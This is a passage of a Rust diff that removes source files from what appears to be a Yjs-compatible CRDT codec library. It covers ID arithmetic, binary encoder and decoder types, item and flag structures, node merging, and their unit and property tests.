Id::new(client, clock)
}
}
impl Sub<Clock> for Id {
type Output = Id;
fn sub(self, rhs: Clock) -> Self::Output {
(self.client, self.clock - rhs).into()
}
}
impl Add<Clock> for Id {
type Output = Id;
fn add(self, rhs: Clock) -> Self::Output {
(self.client, self.clock + rhs).into()
}
}
impl Display for Id {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "({}, {})", self.client, self.clock)
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn basic_id_operation() {
let id_with_different_client_1 = Id::new(1, 1);
let id_with_different_client_2 = Id::new(2, 1);
assert_ne!(id_with_different_client_1, id_with_different_client_2);
assert_eq!(Id::new(1, 1), Id::new(1, 1));
let clock = 2;
assert_eq!(Id::new(1, 1) + clock, (1, 3).into());
assert_eq!(Id::new(1, 3) - clock, (1, 1).into());
}
}
@@ -1,271 +0,0 @@
use std::io::Cursor;
use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt};
use super::*;
#[inline]
pub fn read_with_cursor<T, F>(buffer: &mut Cursor<&[u8]>, f: F) -> JwstCodecResult<T>
where
F: FnOnce(&[u8]) -> IResult<&[u8], T>,
{
// TODO: use remaining_slice() instead after it is stabilized
let input = buffer.get_ref();
let rest_pos = buffer.position().min(input.len() as u64) as usize;
let input = &input[rest_pos..];
let (tail, result) = f(input).map_err(|e| e.map_input(|u| u.len()))?;
buffer.set_position((rest_pos + input.len() - tail.len()) as u64);
Ok(result)
}
// compatible with ydoc v1
#[derive(Clone)]
pub struct RawDecoder<'b> {
pub(super) buffer: Cursor<&'b [u8]>,
}
impl<'b> RawDecoder<'b> {
pub fn new(buffer: &'b [u8]) -> Self {
Self {
buffer: Cursor::new(buffer),
}
}
pub fn rest_ref(&self) -> &[u8] {
let pos = self.buffer.position();
let buf = self.buffer.get_ref();
if pos == 0 {
buf
} else {
&buf[(pos as usize).min(buf.len())..]
}
}
pub fn drain(self) -> &'b [u8] {
let pos = self.buffer.position() as usize;
let buf = self.buffer.into_inner();
if pos == 0 { buf } else { &buf[pos..] }
}
}
impl CrdtReader for RawDecoder<'_> {
fn is_empty(&self) -> bool {
self.buffer.position() >= self.buffer.get_ref().len() as u64
}
fn len(&self) -> u64 {
self.buffer.get_ref().len() as u64 - self.buffer.position()
}
fn read_var_u64(&mut self) -> JwstCodecResult<u64> {
read_with_cursor(&mut self.buffer, read_var_u64)
}
fn read_var_i32(&mut self) -> JwstCodecResult<i32> {
read_with_cursor(&mut self.buffer, read_var_i32)
}
fn read_var_string(&mut self) -> JwstCodecResult<String> {
read_with_cursor(&mut self.buffer, read_var_string)
}
fn read_var_buffer(&mut self) -> JwstCodecResult<Vec<u8>> {
read_with_cursor(&mut self.buffer, |i| {
read_var_buffer(i).map(|(tail, val)| (tail, val.to_vec()))
})
}
fn read_u8(&mut self) -> JwstCodecResult<u8> {
self.buffer.read_u8().map_err(reader::map_read_error)
}
fn read_f32_be(&mut self) -> JwstCodecResult<f32> {
self.buffer.read_f32::<BigEndian>().map_err(reader::map_read_error)
}
fn read_f64_be(&mut self) -> JwstCodecResult<f64> {
self.buffer.read_f64::<BigEndian>().map_err(reader::map_read_error)
}
fn read_i64_be(&mut self) -> JwstCodecResult<i64> {
self.buffer.read_i64::<BigEndian>().map_err(reader::map_read_error)
}
#[inline(always)]
fn read_info(&mut self) -> JwstCodecResult<u8> {
self.read_u8()
}
#[inline(always)]
fn read_item_id(&mut self) -> JwstCodecResult<Id> {
let client = self.read_var_u64()?;
let clock = self.read_var_u64()?;
Ok(Id::new(client, clock))
}
}
// compatible with ydoc v1
#[derive(Default)]
pub struct RawEncoder {
buffer: Cursor<Vec<u8>>,
}
impl RawEncoder {
pub fn into_inner(self) -> Vec<u8> {
self.buffer.into_inner()
}
}
impl CrdtWriter for RawEncoder {
fn write_var_u64(&mut self, num: u64) -> JwstCodecResult {
write_var_u64(&mut self.buffer, num).map_err(writer::map_write_error)
}
fn write_var_i32(&mut self, num: i32) -> JwstCodecResult {
write_var_i32(&mut self.buffer, num).map_err(writer::map_write_error)
}
fn write_var_string<S: AsRef<str>>(&mut self, s: S) -> JwstCodecResult {
write_var_string(&mut self.buffer, s).map_err(writer::map_write_error)
}
fn write_var_buffer(&mut self, buf: &[u8]) -> JwstCodecResult {
write_var_buffer(&mut self.buffer, buf).map_err(writer::map_write_error)
}
fn write_u8(&mut self, num: u8) -> JwstCodecResult {
self.buffer.write_u8(num).map_err(writer::map_write_error)?;
Ok(())
}
fn write_f32_be(&mut self, num: f32) -> JwstCodecResult {
self.buffer.write_f32::<BigEndian>(num).map_err(writer::map_write_error)
}
fn write_f64_be(&mut self, num: f64) -> JwstCodecResult {
self.buffer.write_f64::<BigEndian>(num).map_err(writer::map_write_error)
}
fn write_i64_be(&mut self, num: i64) -> JwstCodecResult {
self.buffer.write_i64::<BigEndian>(num).map_err(writer::map_write_error)
}
#[inline(always)]
fn write_info(&mut self, num: u8) -> JwstCodecResult {
self.write_u8(num)
}
#[inline(always)]
fn write_item_id(&mut self, id: &Id) -> JwstCodecResult {
self.write_var_u64(id.client)?;
self.write_var_u64(id.clock)?;
Ok(())
}
}
#[cfg(test)]
#[allow(clippy::approx_constant)]
mod tests {
use super::*;
#[test]
fn test_crdt_reader() {
{
let mut reader = RawDecoder::new(&[0xf2, 0x5]);
assert_eq!(reader.read_var_u64().unwrap(), 754);
}
{
let mut reader = RawDecoder::new(&[0x5, b'h', b'e', b'l', b'l', b'o']);
assert_eq!(reader.clone().read_var_string().unwrap(), "hello");
assert_eq!(reader.clone().read_var_buffer().unwrap().as_slice(), b"hello");
assert_eq!(reader.read_u8().unwrap(), 5);
assert_eq!(reader.read_u8().unwrap(), b'h');
assert_eq!(reader.read_u8().unwrap(), b'e');
assert_eq!(reader.read_u8().unwrap(), b'l');
assert_eq!(reader.read_u8().unwrap(), b'l');
assert_eq!(reader.read_u8().unwrap(), b'o');
}
{
let mut reader = RawDecoder::new(&[0x40, 0x49, 0x0f, 0xdb]);
assert_eq!(reader.read_f32_be().unwrap(), 3.1415927);
}
{
let mut reader = RawDecoder::new(&[0x40, 0x09, 0x21, 0xfb, 0x54, 0x44, 0x2d, 0x18]);
assert_eq!(reader.read_f64_be().unwrap(), 3.141592653589793);
}
{
let mut reader = RawDecoder::new(&[0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]);
assert_eq!(reader.read_i64_be().unwrap(), i64::MAX);
}
{
let mut reader = RawDecoder::new(&[0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]);
assert_eq!(reader.read_i64_be().unwrap(), i64::MIN);
}
}
#[test]
fn test_crdt_writer() {
{
let mut writer = RawEncoder::default();
writer.write_var_u64(754).unwrap();
assert_eq!(writer.into_inner(), vec![0xf2, 0x5]);
}
{
let ret = vec![0x5, b'h', b'e', b'l', b'l', b'o'];
let mut writer = RawEncoder::default();
writer.write_var_string("hello").unwrap();
assert_eq!(writer.into_inner(), ret);
let mut writer = RawEncoder::default();
writer.write_var_buffer(b"hello").unwrap();
assert_eq!(writer.into_inner(), ret);
let mut writer = RawEncoder::default();
writer.write_u8(5).unwrap();
writer.write_u8(b'h').unwrap();
writer.write_u8(b'e').unwrap();
writer.write_u8(b'l').unwrap();
writer.write_u8(b'l').unwrap();
writer.write_u8(b'o').unwrap();
assert_eq!(writer.into_inner(), ret);
}
{
let mut writer = RawEncoder::default();
writer.write_f32_be(3.1415927).unwrap();
assert_eq!(writer.into_inner(), vec![0x40, 0x49, 0x0f, 0xdb]);
}
{
let mut writer = RawEncoder::default();
writer.write_f64_be(3.141592653589793).unwrap();
assert_eq!(
writer.into_inner(),
vec![0x40, 0x09, 0x21, 0xfb, 0x54, 0x44, 0x2d, 0x18]
);
}
{
let mut writer = RawEncoder::default();
writer.write_i64_be(i64::MAX).unwrap();
assert_eq!(
writer.into_inner(),
vec![0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]
);
}
{
let mut writer = RawEncoder::default();
writer.write_i64_be(i64::MIN).unwrap();
assert_eq!(
writer.into_inner(),
vec![0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
);
}
{
let mut writer = RawEncoder::default();
writer.write_info(0x80).unwrap();
assert_eq!(writer.into_inner(), vec![0x80]);
}
{
let mut writer = RawEncoder::default();
writer.write_item_id(&Id::new(1, 2)).unwrap();
assert_eq!(writer.into_inner(), vec![0x1, 0x2]);
}
}
}
@@ -1,9 +0,0 @@
mod codec_v1;
mod reader;
mod writer;
pub use codec_v1::{RawDecoder, RawEncoder};
pub use reader::{CrdtRead, CrdtReader};
pub use writer::{CrdtWrite, CrdtWriter};
use super::*;
@@ -1,30 +0,0 @@
use std::io::Error;
use super::*;
#[inline]
pub fn map_read_error(e: Error) -> JwstCodecError {
JwstCodecError::IncompleteDocument(e.to_string())
}
pub trait CrdtReader {
fn is_empty(&self) -> bool;
fn len(&self) -> u64;
fn read_var_u64(&mut self) -> JwstCodecResult<u64>;
fn read_var_i32(&mut self) -> JwstCodecResult<i32>;
fn read_var_string(&mut self) -> JwstCodecResult<String>;
fn read_var_buffer(&mut self) -> JwstCodecResult<Vec<u8>>;
fn read_u8(&mut self) -> JwstCodecResult<u8>;
fn read_f32_be(&mut self) -> JwstCodecResult<f32>;
fn read_f64_be(&mut self) -> JwstCodecResult<f64>;
fn read_i64_be(&mut self) -> JwstCodecResult<i64>;
fn read_info(&mut self) -> JwstCodecResult<u8>;
fn read_item_id(&mut self) -> JwstCodecResult<Id>;
}
pub trait CrdtRead<R: CrdtReader> {
fn read(reader: &mut R) -> JwstCodecResult<Self>
where
Self: Sized;
}
@@ -1,28 +0,0 @@
use std::io::Error;
use super::*;
#[inline]
pub fn map_write_error(e: Error) -> JwstCodecError {
JwstCodecError::InvalidWriteBuffer(e.to_string())
}
pub trait CrdtWriter {
fn write_var_u64(&mut self, num: u64) -> JwstCodecResult;
fn write_var_i32(&mut self, num: i32) -> JwstCodecResult;
fn write_var_string<S: AsRef<str>>(&mut self, s: S) -> JwstCodecResult;
fn write_var_buffer(&mut self, buf: &[u8]) -> JwstCodecResult;
fn write_u8(&mut self, num: u8) -> JwstCodecResult;
fn write_f32_be(&mut self, num: f32) -> JwstCodecResult;
fn write_f64_be(&mut self, num: f64) -> JwstCodecResult;
fn write_i64_be(&mut self, num: i64) -> JwstCodecResult;
fn write_info(&mut self, num: u8) -> JwstCodecResult;
fn write_item_id(&mut self, id: &Id) -> JwstCodecResult;
}
pub trait CrdtWrite<W: CrdtWriter> {
fn write(&self, writer: &mut W) -> JwstCodecResult
where
Self: Sized;
}
@@ -1,440 +0,0 @@
use super::*;
#[derive(Debug, Clone)]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub(crate) enum Parent {
#[cfg_attr(test, proptest(skip))]
Type(YTypeRef),
#[cfg_attr(test, proptest(value = "Parent::String(SmolStr::default())"))]
String(SmolStr),
Id(Id),
}
#[derive(Clone)]
#[cfg_attr(all(test, not(loom)), derive(proptest_derive::Arbitrary))]
pub(crate) struct Item {
pub id: Id,
pub origin_left_id: Option<Id>,
pub origin_right_id: Option<Id>,
#[cfg_attr(all(test, not(loom)), proptest(value = "Somr::none()"))]
pub left: ItemRef,
#[cfg_attr(all(test, not(loom)), proptest(value = "Somr::none()"))]
pub right: ItemRef,
pub parent: Option<Parent>,
#[cfg_attr(all(test, not(loom)), proptest(value = "Option::<SmolStr>::None"))]
pub parent_sub: Option<SmolStr>,
pub content: Content,
#[cfg_attr(all(test, not(loom)), proptest(value = "ItemFlag::default()"))]
pub flags: ItemFlag,
}
// make all Item readonly
pub(crate) type ItemRef = Somr<Item>;
impl PartialEq for Item {
fn eq(&self, other: &Self) -> bool {
self.id == other.id
}
}
impl Eq for Item {}
impl std::fmt::Debug for Item {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut dbg = f.debug_struct("Item");
dbg
.field("id", &self.id)
.field("origin_left_id", &self.origin_left_id)
.field("origin_right_id", &self.origin_right_id);
if let Some(left) = self.left.get() {
dbg.field("left", &left.id);
}
if let Some(right) = self.right.get() {
dbg.field("right", &right.id);
}
dbg
.field(
"parent",
&self.parent.as_ref().map(|p| match p {
Parent::Type(_) => "[Type]".to_string(),
Parent::String(name) => format!("Parent({name})"),
Parent::Id(id) => format!("({}, {})", id.client, id.clock),
}),
)
.field("parent_sub", &self.parent_sub)
.field("content", &self.content)
.field("flags", &self.flags)
.finish()
}
}
impl std::fmt::Display for Item {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "Item{}: [{:?}]", self.id, self.content)
}
}
impl Default for Item {
fn default() -> Self {
Self {
id: Id::default(),
origin_left_id: None,
origin_right_id: None,
left: Somr::none(),
right: Somr::none(),
parent: None,
parent_sub: None,
content: Content::Deleted(0),
flags: ItemFlag::from(0),
}
}
}
impl Item {
pub fn new(
id: Id,
content: Content,
left: Somr<Item>,
right: Somr<Item>,
parent: Option<Parent>,
parent_sub: Option<SmolStr>,
) -> Self {
let flags = ItemFlag::from(if content.countable() {
item_flags::ITEM_COUNTABLE
} else {
0
});
Self {
id,
origin_left_id: left.get().map(|left| left.last_id()),
left,
origin_right_id: right.get().map(|right| right.id),
right,
parent,
parent_sub,
content,
flags,
}
}
// find a note that has parent info
// in crdt tree, not all node has parent info
// so we need to check left and right node if they have parent info
pub fn find_node_with_parent_info(&self) -> Option<Item> {
if self.parent.is_some() {
return Some(self.clone());
} else if let Some(item) = self.left.get() {
if item.parent.is_none() {
if let Some(item) = item.right.get() {
return Some(item.clone());
}
} else {
return Some(item.clone());
}
} else if let Some(item) = self.right.get() {
return Some(item.clone());
}
None
}
pub fn len(&self) -> u64 {
self.content.clock_len()
}
pub fn deleted(&self) -> bool {
self.flags.deleted()
}
pub fn delete(&self) -> bool {
if self.deleted() {
return false;
}
self.flags.set_deleted();
true
}
pub fn countable(&self) -> bool {
self.flags.countable()
}
pub fn keep(&self) -> bool {
self.flags.keep()
}
pub fn indexable(&self) -> bool {
self.countable() && !self.deleted()
}
pub fn last_id(&self) -> Id {
let Id { client, clock } = self.id;
Id::new(client, clock + self.len() - 1)
}
pub fn split_at(&self, offset: u64) -> JwstCodecResult<(Self, Self)> {
debug_assert!(offset > 0 && self.len() > 1 && offset < self.len());
let id = self.id;
let right_id = Id::new(id.client, id.clock + offset);
let (left_content, right_content) = self.content.split(offset)?;
let left_item = Item::new(
id,
left_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
self.parent.clone(),
self.parent_sub.clone(),
);
let right_item = Item::new(
right_id,
right_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
self.parent.clone(),
self.parent_sub.clone(),
);
if left_item.deleted() {
left_item.flags.set_deleted();
}
if left_item.keep() {
left_item.flags.set_keep();
}
Ok((left_item, right_item))
}
fn get_info(&self) -> u8 {
let mut info = self.content.get_info();
if self.origin_left_id.is_some() {
info |= item_flags::ITEM_HAS_LEFT_ID;
}
if self.origin_right_id.is_some() {
info |= item_flags::ITEM_HAS_RIGHT_ID;
}
if self.parent_sub.is_some() {
info |= item_flags::ITEM_HAS_PARENT_SUB;
}
info
}
pub fn is_valid(&self) -> bool {
let has_id = self.origin_left_id.is_some() || self.origin_right_id.is_some();
!has_id && self.parent.is_some() || has_id && self.parent.is_none() && self.parent_sub.is_none()
}
pub fn read<R: CrdtReader>(decoder: &mut R, id: Id, info: u8, first_5_bit: u8) -> JwstCodecResult<Self> {
let flags: ItemFlag = info.into();
let has_left_id = flags.check(item_flags::ITEM_HAS_LEFT_ID);
let has_right_id = flags.check(item_flags::ITEM_HAS_RIGHT_ID);
let has_parent_sub = flags.check(item_flags::ITEM_HAS_PARENT_SUB);
let has_not_sibling = flags.not(item_flags::ITEM_HAS_SIBLING);
// NOTE: read order must keep the same as the order in yjs
// TODO: this data structure design will break the cpu OOE, need to be optimized
let item = Self {
id,
origin_left_id: if has_left_id {
Some(decoder.read_item_id()?)
} else {
None
},
origin_right_id: if has_right_id {
Some(decoder.read_item_id()?)
} else {
None
},
parent: {
if has_not_sibling {
let has_parent = decoder.read_var_u64()? == 1;
Some(if has_parent {
Parent::String(SmolStr::new(decoder.read_var_string()?))
} else {
Parent::Id(decoder.read_item_id()?)
})
} else {
None
}
},
parent_sub: if has_not_sibling && has_parent_sub {
Some(SmolStr::new(decoder.read_var_string()?))
} else {
None
},
content: {
// tag must not GC or Skip, this must process in parse_struct
debug_assert_ne!(first_5_bit, 0);
debug_assert_ne!(first_5_bit, 10);
Content::read(decoder, first_5_bit)?
},
left: Somr::none(),
right: Somr::none(),
flags: ItemFlag::from(0),
};
if item.content.countable() {
item.flags.set_countable();
}
if matches!(item.content, Content::Deleted(_)) {
item.flags.set_deleted();
}
debug_assert!(item.is_valid());
Ok(item)
}
pub fn write<W: CrdtWriter>(&self, encoder: &mut W) -> JwstCodecResult {
let info = self.get_info();
let has_not_sibling = info & item_flags::ITEM_HAS_SIBLING == 0;
encoder.write_info(info)?;
if let Some(left_id) = self.origin_left_id {
encoder.write_item_id(&left_id)?;
}
if let Some(right_id) = self.origin_right_id {
encoder.write_item_id(&right_id)?;
}
if has_not_sibling {
if let Some(parent) = &self.parent {
match parent {
Parent::String(s) => {
encoder.write_var_u64(1)?;
encoder.write_var_string(s)?;
}
Parent::Id(id) => {
encoder.write_var_u64(0)?;
encoder.write_item_id(id)?;
}
Parent::Type(ty) => {
if let Some(ty) = ty.ty() {
if let Some(item) = ty.item.get() {
encoder.write_var_u64(0)?;
encoder.write_item_id(&item.id)?;
} else if let Some(name) = &ty.root_name {
encoder.write_var_u64(1)?;
encoder.write_var_string(name)?;
}
}
}
}
} else {
// if item delete, it must not exists in crdt state tree
debug_assert!(!self.deleted());
return Err(JwstCodecError::ParentNotFound);
}
if let Some(parent_sub) = &self.parent_sub {
encoder.write_var_string(parent_sub)?;
}
}
self.content.write(encoder)?;
Ok(())
}
pub fn deep_compare(&self, other: &Self) -> bool {
if self.id != other.id
|| self.deleted() != other.deleted()
|| self.len() != other.len()
|| self.left.get().map(|l| l.last_id()) != other.left.get().map(|l| l.last_id())
|| self.right.get().map(|r| r.id) != other.right.get().map(|r| r.id)
|| self.origin_left_id != other.origin_left_id
|| self.origin_right_id != other.origin_right_id
|| self.parent_sub != other.parent_sub
{
return false;
}
true
}
}
#[allow(dead_code)]
#[cfg(any(debug, test))]
impl Item {
pub fn print_left(&self) {
let mut ret = vec![format!("Self{}: [{:?}]", self.id, self.content)];
let mut left: Somr<Item> = self.left.clone();
while let Some(item) = left.get() {
ret.push(format!("{item}"));
left = item.left.clone();
}
ret.reverse();
println!("{}", ret.join(" <- "));
}
pub fn print_right(&self) {
let mut ret = vec![format!("Self{}: [{:?}]", self.id, self.content)];
let mut right = self.right.clone();
while let Some(item) = right.get() {
ret.push(format!("{item}"));
right = item.right.clone();
}
println!("{}", ret.join(" -> "));
}
}
#[cfg(test)]
mod tests {
#[cfg(not(loom))]
use proptest::{collection::vec, prelude::*};
#[cfg(not(loom))]
use super::*;
#[cfg(not(loom))]
fn item_round_trip(item: &mut Item) -> JwstCodecResult {
if !item.is_valid() {
return Ok(());
}
if item.content.countable() {
item.flags.set_countable();
}
let mut encoder = RawEncoder::default();
item.write(&mut encoder)?;
let update = encoder.into_inner();
let mut decoder = RawDecoder::new(&update);
let info = decoder.read_info()?;
let first_5_bit = info & 0b11111;
let decoded_item = Item::read(&mut decoder, item.id, info, first_5_bit)?;
assert_eq!(item, &decoded_item);
Ok(())
}
#[cfg(not(loom))]
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_content(mut items in vec(any::<Item>(), 0..10)) {
for item in &mut items {
item_round_trip(item).unwrap();
}
}
}
}
@@ -1,170 +0,0 @@
use std::sync::atomic::{AtomicU8, Ordering};
#[rustfmt::skip]
#[allow(dead_code)]
pub mod item_flags {
pub const ITEM_KEEP : u8 = 0b0000_0001;
pub const ITEM_COUNTABLE : u8 = 0b0000_0010;
pub const ITEM_DELETED : u8 = 0b0000_0100;
pub const ITEM_MARKED : u8 = 0b0000_1000;
pub const ITEM_HAS_PARENT_SUB : u8 = 0b0010_0000;
pub const ITEM_HAS_RIGHT_ID : u8 = 0b0100_0000;
pub const ITEM_HAS_LEFT_ID : u8 = 0b1000_0000;
pub const ITEM_HAS_SIBLING : u8 = 0b1100_0000;
}
#[derive(Debug)]
pub struct ItemFlag(pub(self) AtomicU8);
impl Default for ItemFlag {
fn default() -> Self {
Self(AtomicU8::new(0))
}
}
impl Clone for ItemFlag {
fn clone(&self) -> Self {
Self(AtomicU8::new(self.0.load(Ordering::Acquire)))
}
}
impl From<u8> for ItemFlag {
fn from(flags: u8) -> Self {
Self(AtomicU8::new(flags))
}
}
#[allow(dead_code)]
impl ItemFlag {
#[inline(always)]
pub fn set(&self, flag: u8) {
self.0.fetch_or(flag, Ordering::SeqCst);
}
#[inline(always)]
pub fn clear(&self, flag: u8) {
self.0.fetch_and(!flag, Ordering::SeqCst);
}
#[inline(always)]
pub fn check(&self, flag: u8) -> bool {
self.0.load(Ordering::Acquire) & flag == flag
}
#[inline(always)]
pub fn not(&self, flag: u8) -> bool {
self.0.load(Ordering::Acquire) & flag == 0
}
#[inline(always)]
pub fn keep(&self) -> bool {
self.check(item_flags::ITEM_KEEP)
}
#[inline(always)]
pub fn set_keep(&self) {
self.set(item_flags::ITEM_KEEP);
}
#[inline(always)]
pub fn clear_keep(&self) {
self.clear(item_flags::ITEM_KEEP);
}
#[inline(always)]
pub fn countable(&self) -> bool {
self.check(item_flags::ITEM_COUNTABLE)
}
#[inline(always)]
pub fn set_countable(&self) {
self.set(item_flags::ITEM_COUNTABLE);
}
#[inline(always)]
pub fn clear_countable(&self) {
self.clear(item_flags::ITEM_COUNTABLE);
}
#[inline(always)]
pub fn deleted(&self) -> bool {
self.check(item_flags::ITEM_DELETED)
}
#[inline(always)]
pub fn set_deleted(&self) {
self.set(item_flags::ITEM_DELETED);
}
#[inline(always)]
pub fn clear_deleted(&self) {
self.clear(item_flags::ITEM_DELETED);
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_flag_set_and_clear() {
{
let flag = super::ItemFlag::default();
assert!(!flag.keep());
flag.set_keep();
assert!(flag.keep());
flag.clear_keep();
assert!(!flag.keep());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
{
let flag = super::ItemFlag::default();
assert!(!flag.countable());
flag.set_countable();
assert!(flag.countable());
flag.clear_countable();
assert!(!flag.countable());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
{
let flag = super::ItemFlag::default();
assert!(!flag.deleted());
flag.set_deleted();
assert!(flag.deleted());
flag.clear_deleted();
assert!(!flag.deleted());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
{
let flag = super::ItemFlag::default();
flag.set_keep();
flag.set_countable();
flag.set_deleted();
assert!(flag.keep());
assert!(flag.countable());
assert!(flag.deleted());
flag.clear_keep();
flag.clear_countable();
flag.clear_deleted();
assert!(!flag.keep());
assert!(!flag.countable());
assert!(!flag.deleted());
assert_eq!(
flag.0.load(Ordering::SeqCst),
ItemFlag::default().0.load(Ordering::SeqCst)
);
}
}
}
@@ -1,25 +0,0 @@
mod any;
mod content;
mod delete_set;
mod id;
mod io;
mod item;
mod item_flag;
mod refs;
mod update;
#[cfg(test)]
mod utils;
pub use any::Any;
pub(crate) use content::Content;
pub use delete_set::DeleteSet;
pub use id::{Client, Clock, Id};
pub use io::{CrdtRead, CrdtReader, CrdtWrite, CrdtWriter, RawDecoder, RawEncoder};
pub(crate) use item::{Item, ItemRef, Parent};
pub(crate) use item_flag::{ItemFlag, item_flags};
pub(crate) use refs::Node;
pub use update::Update;
#[cfg(test)]
pub(crate) use utils::*;
use super::*;
@@ -1,488 +0,0 @@
use super::*;
// make fields Copy + Clone without much effort
#[derive(Debug, Clone)]
#[cfg_attr(all(test, not(loom)), derive(proptest_derive::Arbitrary))]
pub(crate) enum Node {
GC(Box<NodeLen>),
Skip(Box<NodeLen>),
Item(ItemRef),
}
/// Simple representation of id and len struct used by GC and Skip node.
#[derive(Debug, Clone)]
#[cfg_attr(all(test, not(loom)), derive(proptest_derive::Arbitrary))]
pub(crate) struct NodeLen {
pub id: Id,
pub len: u64,
}
impl<W: CrdtWriter> CrdtWrite<W> for Node {
fn write(&self, writer: &mut W) -> JwstCodecResult {
match self {
Node::GC(item) => {
writer.write_info(0)?;
writer.write_var_u64(item.len)
}
Node::Skip(item) => {
writer.write_info(10)?;
writer.write_var_u64(item.len)
}
Node::Item(item) => item.get().unwrap().write(writer),
}
}
}
impl PartialEq for Node {
fn eq(&self, other: &Self) -> bool {
match (self, other) {
(Node::GC(left), Node::GC(right)) => left.id == right.id,
(Node::Skip(left), Node::Skip(right)) => left.id == right.id,
(Node::Item(item1), Node::Item(item2)) => item1.get() == item2.get(),
_ => false,
}
}
}
impl Eq for Node {}
impl From<Item> for Node {
fn from(value: Item) -> Self {
Self::Item(Somr::new(value))
}
}
impl Node {
pub fn new_skip(id: Id, len: u64) -> Self {
Self::Skip(Box::new(NodeLen { id, len }))
}
pub fn new_gc(id: Id, len: u64) -> Self {
Self::GC(Box::new(NodeLen { id, len }))
}
pub fn read<R: CrdtReader>(decoder: &mut R, id: Id) -> JwstCodecResult<Self> {
let info = decoder.read_info()?;
let first_5_bit = info & 0b11111;
match first_5_bit {
0 => {
let len = decoder.read_var_u64()?;
Ok(Node::new_gc(id, len))
}
10 => {
let len = decoder.read_var_u64()?;
Ok(Node::new_skip(id, len))
}
_ => {
let item = Somr::new(Item::read(decoder, id, info, first_5_bit)?);
if let Content::Type(ty) = &item.get().unwrap().content
&& let Some(mut ty) = ty.ty_mut()
{
ty.item = item.clone();
}
Ok(Node::Item(item))
}
}
}
pub fn id(&self) -> Id {
match self {
Node::GC(item) => item.id,
Node::Skip(item) => item.id,
Node::Item(item) => unsafe { item.get_unchecked() }.id,
}
}
pub fn client(&self) -> Client {
self.id().client
}
pub fn clock(&self) -> Clock {
self.id().clock
}
pub fn len(&self) -> u64 {
match self {
Self::GC(item) => item.len,
Self::Skip(item) => item.len,
Self::Item(item) => unsafe { item.get_unchecked() }.len(),
}
}
pub fn is_gc(&self) -> bool {
matches!(self, Self::GC { .. })
}
pub fn is_skip(&self) -> bool {
matches!(self, Self::Skip { .. })
}
pub fn is_item(&self) -> bool {
matches!(self, Self::Item(_))
}
pub fn as_item(&self) -> Somr<Item> {
if let Self::Item(item) = self {
item.clone()
} else {
Somr::none()
}
}
pub fn left(&self) -> Option<Self> {
if let Node::Item(item) = self {
item.get().map(|item| Node::Item(item.left.clone()))
} else {
None
}
}
pub fn right(&self) -> Option<Self> {
if let Node::Item(item) = self {
item.get().map(|item| Node::Item(item.right.clone()))
} else {
None
}
}
pub fn head(&self) -> Self {
let mut cur = self.clone();
while let Some(left) = cur.left() {
if left.is_item() {
cur = left
} else {
break;
}
}
cur
}
#[allow(dead_code)]
pub fn tail(&self) -> Self {
let mut cur = self.clone();
while let Some(right) = cur.right() {
if right.is_item() {
cur = right
} else {
break;
}
}
cur
}
pub fn flags(&self) -> ItemFlag {
if let Node::Item(item) = self {
item.get().unwrap().flags.clone()
} else {
// deleted
ItemFlag::from(4)
}
}
pub fn last_id(&self) -> Option<Id> {
if let Node::Item(item) = self {
item.get().map(|item| item.last_id())
} else {
None
}
}
pub fn split_at(&self, offset: u64) -> JwstCodecResult<(Self, Self)> {
if let Self::Item(item) = self {
let item = item.get().unwrap();
debug_assert!(offset > 0 && item.len() > 1 && offset < item.len());
let id = item.id;
let right_id = Id::new(id.client, id.clock + offset);
let (left_content, right_content) = item.content.split(offset)?;
let left_item = Somr::new(Item::new(
id,
left_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
item.parent.clone(),
item.parent_sub.clone(),
));
let right_item = Somr::new(Item::new(
right_id,
right_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
item.parent.clone(),
item.parent_sub.clone(),
));
Ok((Self::Item(left_item), Self::Item(right_item)))
} else {
Err(JwstCodecError::ItemSplitNotSupport)
}
}
#[inline]
#[allow(dead_code)]
pub fn countable(&self) -> bool {
self.flags().countable()
}
#[inline]
pub fn deleted(&self) -> bool {
self.flags().deleted()
}
pub fn merge(&mut self, right: Self) -> bool {
match (self, right) {
(Node::GC(left), Node::GC(right)) => {
left.len += right.len;
}
(Node::Skip(left), Node::Skip(right)) => {
left.len += right.len;
}
(Node::Item(lref), Node::Item(rref)) => {
let mut litem = unsafe { lref.get_mut_unchecked() };
let mut ritem = unsafe { rref.get_mut_unchecked() };
let llen = litem.len();
let parent_kind = match &litem.parent {
Some(Parent::Type(ty)) => ty.ty().map(|ty| ty.kind()),
_ => None,
};
if litem.id.client != ritem.id.client
// not same delete status
|| litem.deleted() != ritem.deleted()
// not clock continuous
|| litem.id.clock + litem.len() != ritem.id.clock
// not insertion continuous
|| Some(litem.last_id()) != ritem.origin_left_id
// not insertion continuous
|| litem.origin_right_id != ritem.origin_right_id
// not runtime continuous
|| litem.right != rref
{
return false;
}
match (&mut litem.content, &mut ritem.content) {
(Content::Deleted(l), Content::Deleted(r)) => {
*l += *r;
}
(Content::Json(l), Content::Json(r)) => {
l.extend(r.drain(0..));
}
(Content::String(l), Content::String(r)) => {
let allow_merge_string = matches!(parent_kind, Some(YTypeKind::Text | YTypeKind::XMLText));
if !allow_merge_string {
return false;
}
*l += r;
}
(Content::Any(l), Content::Any(r)) => {
